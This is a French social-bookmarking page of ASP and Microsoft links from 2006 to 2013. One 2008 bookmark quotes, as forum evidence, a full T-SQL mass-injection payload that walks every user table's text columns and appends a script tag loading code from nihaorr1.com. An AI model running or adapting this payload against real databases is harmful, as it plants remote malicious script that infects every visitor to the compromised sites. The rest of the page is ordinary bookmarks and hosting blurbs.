public marks

PUBLIC MARKS with tags ASP & microsoft

2013

2008

Anyone know about www.nihaorr1.com/1.js? - IIS.net

by night.kame (via)

DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update [' @T '] set [' @C ']=rtrim(convert(varchar'[' @C '])) ''<script src=nihaorr1.com/1.js></script>''')FETCH NEXT FROM Table_Cursor INTO @T'@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Avec SQL Server, la vie est plus simple.

2007

Two minute Tips

by kalooni
Developer tips in video

Hébergement Web

by Ptit-oups
Une offre très intéresante d'hébergement Web pour toutes les applications microsof et autrest. Profitez ainsi des dernières technologies Microsoft avec AJAX, ASP NET 2.0 et SQL Server 2005.

2006

Coder`s daily news

by cyby
Just new software and programming languages comments.

MSDN – Centre de développement Web

by MaoTseTongue & 3 others (via)
Quand Microsoft fait dans l'auto-dérision pour attirrer les djeunz programmeur, ça devient n'importe quoi.

15 Seconds : A Step-by-Step Guide To Using MySQL with ASP.NET - Part 1

by bcpbcp
Back in the days of classic ASP, if you were building a database-driven web site, your choice was either to invest a lot of money to get a copy of Microsoft SQL Server (or some other enterprise-ready database) or invest a lot of time finding a way to deal with the performance and scalability limitations of Microsoft Access. Luckily these days there's another viable alternative: MySQL.

Active users

astrochoupe
last mark : 28/03/2013 14:32

night.kame
last mark : 26/04/2008 13:58

kalooni
last mark : 20/06/2007 07:47

jsquared71
last mark : 19/03/2007 13:02

Ptit-oups
last mark : 14/02/2007 14:09

cyby
last mark : 28/07/2006 08:21

jasonbentley
last mark : 14/04/2006 10:48

MaoTseTongue
last mark : 19/02/2006 12:16

bcpbcp
last mark : 19/01/2006 17:33